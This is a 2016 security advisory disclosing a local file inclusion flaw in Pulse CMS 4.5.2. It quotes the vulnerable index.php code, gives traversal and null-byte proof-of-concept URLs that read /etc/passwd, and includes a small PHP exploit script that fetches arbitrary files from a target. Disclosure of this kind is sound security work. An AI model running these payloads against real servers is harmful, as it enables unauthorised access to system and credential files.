Pulse CMS version 4.5.2 suffers from a local file inclusion vulnerability.
f65d55c4c5903b29a885eeab0b5eb131445994ce6a6c73cb2e333288eaa52429
Document Title:
===============
Pulse CMS 4.5.2 - Local File Inclusion
References (Source):
====================
http://ehsansec.ir/advisories/plusecms452-lfi.txt
Release Date:
=============
2016-02-28
Product & Service Introduction:
===============================
Pulse CMS is the easiest way to build and deploy a responsive, content
managed website. Since it's a flat file CMS there is no complicated
database setup, just copy it to your server and
go.(https://www.pulsecms.com/)
Software Link:
==============
http://www.pulsecms.com/download/pulse.zip
Vulnerability Type:
=========================
Local File Inclusion
Vulnerability Details:
==============================
I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2.
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Vulnerable File & Code:
=======================
index.php
9 $page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home';
10 $page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');
11
12 if (preg_match("/\//", $page)){
13 if(file_exists("content/pages/".$page."home.txt")){
14 $page = $page."home";
15 }
16 }
27 include("content/pages/$page.txt");
Proof of Concept (PoC):
=======================
-- Local File Inclusion --
http://localhost/pluse/index.php?p=../../../../YourPHP.php
-- For include other type files use null byte nullbyte --
http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php
PHP Exploit
<?php
# index.php
$target = $argv[1];
$file = $argv[2];
// page : index.php
echo "Pulse CMS 4.5.2 - Local File Inclusion\n";
echo "Author : Ehsan Hosseini\n\n\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, $target.'index.php?p='.$file."%00.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
$ex = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $ex;
?>
Author:
==================
Ashiyane Digital Security Team
Ehsan Hosseini
http://ehsansec.ir/
SPX tnx to:
===========
Bl4ck_mohajem
Contact:
========
hehsan979@gmail.com
info@ehsansec.ir